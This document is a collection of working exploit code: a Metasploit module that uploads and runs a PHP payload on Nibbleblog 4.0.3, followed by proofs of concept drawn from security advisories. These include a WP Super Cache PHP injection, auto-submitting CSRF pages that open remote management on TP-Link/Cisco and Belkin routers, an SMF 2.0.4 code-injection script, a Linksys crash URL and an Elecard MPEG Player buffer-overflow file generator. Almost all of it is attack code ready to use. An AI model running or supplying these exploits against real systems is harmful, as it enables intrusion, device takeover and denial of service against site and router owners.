## # This module requires Metasploit: http://www.metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info( info, 'Name' => 'Nibbleblog File Upload Vulnerability', 'Description' => %q{ Nibbleblog contains a flaw that allows a authenticated remote attacker to execute arbitrary PHP code. This module was tested on version 4.0.3. }, 'License' => MSF_LICENSE, 'Author' => [ 'Unknown', # Vulnerability Disclosure - Curesec Research Team. Author's name? 'Roberto Soares Espreto <robertoespreto[at]gmail.com>' # Metasploit Module ], 'References' => [ ['URL', 'http://blog.curesec.com/article/blog/NibbleBlog-403-Code-Execution-47.html'] ], 'DisclosureDate' => 'Sep 01 2015', 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Targets' => [['Nibbleblog 4.0.3', {}]], 'DefaultTarget' => 0 )) register_options( [ OptString.new('TARGETURI', [true, 'The base path to the web application', '/']), OptString.new('USERNAME', [true, 'The username to authenticate with']), OptString.new('PASSWORD', [true, 'The password to authenticate with']) ], self.class) end def username datastore['USERNAME'] end def password datastore['PASSWORD'] end def check cookie = do_login(username, password) return Exploit::CheckCode::Detected unless cookie res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'admin.php'), 'cookie' => cookie, 'vars_get' => { 'controller' => 'settings', 'action' => 'general' } ) if res && res.code == 200 && res.body.include?('Nibbleblog 4.0.3 "Coffee"') return Exploit::CheckCode::Appears end Exploit::CheckCode::Safe end def do_login(user, pass) res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'admin.php') ) fail_with(Failure::Unreachable, 'No response received from the target.') unless res session_cookie = res.get_cookies vprint_status("#{peer} - Logging in...") res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'admin.php'), 'cookie' => session_cookie, 'vars_post' => { 'username' => user, 'password' => pass } ) return session_cookie if res && res.code == 302 && res.headers['Location'] nil end def exploit unless [ Exploit::CheckCode::Detected, Exploit::CheckCode::Appears ].include?(check) print_error("Target does not appear to be vulnerable.") return end vprint_status("#{peer} - Authenticating using #{username}:#{password}") cookie = do_login(username, password) fail_with(Failure::NoAccess, 'Unable to login. Verify USERNAME/PASSWORD or TARGETURI.') if cookie.nil? vprint_good("#{peer} - Authenticated with Nibbleblog.") vprint_status("#{peer} - Preparing payload...") payload_name = "#{Rex::Text.rand_text_alpha_lower(10)}.php" data = Rex::MIME::Message.new data.add_part('my_image', nil, nil, 'form-data; name="plugin"') data.add_part('My image', nil, nil, 'form-data; name="title"') data.add_part('4', nil, nil, 'form-data; name="position"') data.add_part('', nil, nil, 'form-data; name="caption"') data.add_part(payload.encoded, 'application/x-php', nil, "form-data; name=\"image\"; filename=\"#{payload_name}\"") data.add_part('1', nil, nil, 'form-data; name="image_resize"') data.add_part('230', nil, nil, 'form-data; name="image_width"') data.add_part('200', nil, nil, 'form-data; name="image_height"') data.add_part('auto', nil, nil, 'form-data; name="image_option"') post_data = data.to_s vprint_status("#{peer} - Uploading payload...") res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri, 'admin.php'), 'vars_get' => { 'controller' => 'plugins', 'action' => 'config', 'plugin' => 'my_image' }, 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'data' => post_data, 'cookie' => cookie ) if res && /Call to a member function getChild\(\) on a non\-object/ === res.body fail_with(Failure::Unknown, 'Unable to upload payload. Does the server have the My Image plugin installed?') elsif res && !( res.body.include?('<b>Warning</b>') || res.body.include?('warn') ) fail_with(Failure::Unknown, 'Unable to upload payload.') end vprint_good("#{peer} - Uploaded the payload.") php_fname = 'image.php' payload_url = normalize_uri(target_uri.path, 'content', 'private', 'plugins', 'my_image', php_fname) vprint_status("#{peer} - Parsed response.") register_files_for_cleanup(php_fname) vprint_status("#{peer} - Executing the payload at #{payload_url}.") send_request_cgi( 'uri' => payload_url, 'method' => 'GET' ) end end

source: https://www.securityfocus.com/bid/59470/info The WP Super Cache plugin for WordPress is prone to a remote PHP code-execution vulnerability. An attacker can exploit this issue to execute arbitrary PHP code within the context of the web server. WP Super Cache 1.2 is vulnerable; other versions may also be affected. <!?mfunc echo PHP_VERSION; ?><!?/mfunc?>

source: https://www.securityfocus.com/bid/59442/info The TP-Link TL-WR1043N Router is prone to a cross-site request-forgery vulnerability. Attackers can exploit this issue to perform certain administrative actions and gain unauthorized access to the affected device. d> <title>Cisco WRT310Nv2 Firmware v2.0.01 CSRF/XSS</title> <!--*Discovered by: Jacob Holcomb - Security Analyst @ Independent Security Evaluators --> </head> <body> <form name="CSRFxssPWN" action="http://ww.example.com/apply.cgi" method="post"/> <input type="hidden" name="submit_button" value="Management"/> <input type="hidden" name="action" value="Apply"/> <input type="hidden" name="PasswdModify" value="1"/> <input type="hidden" name="http_enable" value="1"/> <input type="hidden" name="wait_time" value="0"/> <input type="hidden" name="http_passwd" value="ISE_1337"/> <input type="hidden" name="http_passwdConfirm" value="ISE_1337"/> <input type="hidden" name="_http_enable" value="1"/> <input type="hidden" name="remote_management" value="1"/> <input type="hidden" name="remote_upgrade" value="1"/> <input type="hidden" name="remote_ip_any" value="1"/> <input type="hidden" name="http_wanport" value="1337"/> <input type="hidden" name="upnp_enable" value="1"/> <input type="hidden" name="upnp_config" value="1"/> <input type="hidden" name="upnp_internet_dis" value="1"/> </form> <script> function PwN() {document.CSRFxssPWN.submit();}; window.setTimeout(PwN, 0025); </script> <body> </html>

source: https://www.securityfocus.com/bid/59409/info SMF is prone to an HTML-injection and multiple PHP code-injection vulnerabilities. An attacker may leverage these issues to execute arbitrary server-side script code on an affected computer with the privileges of the affected application and inject hostile HTML and script code into vulnerable sections of the application. SMF 2.0.4 is vulnerable; other versions may also be affected. <?php // proof of concept that latest SMF (2.0.4) can be exploited by php injection. // payload code must escape from \', so you should try with something like // that: // p0c\';phpinfo();// as a 'dictionary' value. Same story for locale // parameter. // For character_set - another story, as far as I remember, because here we // have // a nice stored xss. ;) // 21/04/2013 // http://HauntIT.blogspot.com // to successfully exploit smf 2.0.4 we need correct admin's cookie: $cookie = 'SMFCookie956=allCookiesHere'; $ch = curl_init('http://smf_2.0.4/index.php?action=admin;area=languages;sa=editlang;lid=english'); curl_setopt($ch, CURLOPT_HEADER, 1); curl_setopt($ch, CURLOPT_COOKIE, $cookie); curl_setopt($ch, CURLOPT_POST, 1); // send as POST (to 'On') curl_setopt($ch, CURLOPT_POSTFIELDS, "character_set=en&locale=helloworld&dictionary=p0c\\';phpinfo();//&spelling=american&ce0361602df1=c6772abdb6d5e3f403bd65e3c3c2a2c0&save_main=Save"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $page = curl_exec($ch); echo 'PHP code:<br>'.$page; curl_close($ch); // to close 'logged-in' part ?>

source: https://www.securityfocus.com/bid/59476/info Belkin F5D8236-4 Router is prone to a cross-site request-forgery vulnerability. Attackers can exploit this issue to perform certain administrative actions and gain unauthorized access to the affected device. <html> <head> <title>Belkin F5D8236-4 v2 CSRF - Enable Remote MGMT.</title> <!-- Use JavaScript debugging to bypass authentication --> <!--*Discovered by: Jacob Holcomb - Security Analyst @ Independent Security Evaluators --> </head> <body> <form name="belkin" action="http://X.X.X.X/cgi-bin/system_setting.exe" method="post"/> <input type="hidden" name="remote_mgmt_enabled" value="1"/> <input type="hidden" name="remote_mgmt_port" value="31337"/> <input type="hidden" name="allow_remote_ip" value="0"/> </form> <script> function BeLkIn() {document.belkin.submit();}; window.setTimeout(BeLkIn, 0000); </script> <body> </html>

source: https://www.securityfocus.com/bid/59445/info The Cisco Linksys WRT310N Router is prone to multiple denial-of-service vulnerabilities when handling specially crafted HTTP requests. Successful exploits will cause the device to crash, denying service to legitimate users. http://www.example.com/apply.cgi?pptp_dhcp=0&submit_button=index&change_action=&submit_type=&action=Apply&now_proto=dhcp&daylight_time=1&lan_ipaddr=4&wait_time=0&need_reboot=0&dhcp_check=&lan_netmask_0=&lan_netmask_1=&lan_netmask_2=&lan_netmask_3=&timer_interval=30&language=EN&wan_proto=dhcp&wan_hostname=&wan_domain=&mtu_enable=0&lan_ipaddr_0=192&lan_ipaddr_1=168&lan_ipaddr_2=1&lan_ipaddr_3=1&lan_netmask=255.255.255.0&url_address=my.wrt310n&lan_proto=dhcp&dhcp_start=100&dhcp_num=50&dhcp_lease=0&wan_dns=4&wan_dns0_0=0&wan_dns0_1=0&wan_dns0_2=0&wan_dns0_3=0&wan_dns1_0=0&wan_dns1_1=0&wan_dns1_2=0&wan_dns1_3=0&wan_dns2_0=0&wan_dns2_1=0&wan_dns2_2=0&wan_dns2_3=0&wan_wins=4&wan_wins_0=0&wan_wins_1=0&wan_wins_2=0&wan_wins_3=AAAAAAAAAAAAAAAAAAA&time_zone=-08+1+1&_daylight_time=1

source: https://www.securityfocus.com/bid/59534/info Elecard MPEG Player is prone to a buffer-overflow vulnerability because the application fails to bounds-check user-supplied data before copying it into an insufficiently sized buffer. Attackers can execute arbitrary code in the context of the affected application. Failed exploit attempts will result in a denial-of-service condition. Elecard MPEG Player 5.8 is vulnerable; other versions may also be affected. #!/usr/bin/python # Exploit Title:Elecard MPEG Player 5.8 Local PoC # Download link :www.elecard.com/assets/files/distribs/mpeg-player/EMpgPlayer.zip # Product: Vulnerable # Elecard MPEG Player,Elecard AVC HD Player # RST # Date (found): 27.04.2013 # Date (publish): 27.04.2013 # Author: metacom # version:5.8.121004 # Category: poc # Tested on: windows 7 German head="#EXTM3U\n" head+="#EXTINF:153,Artist - song\n" filename= "elecard.m3u" buffer= "\x41" * 783 buffer+="\x42" * 4 buffer+="\x43" * 4 buffer+="\x44" * 25000 textfile = open(filename , 'w') textfile.write(head+buffer) textfile.close()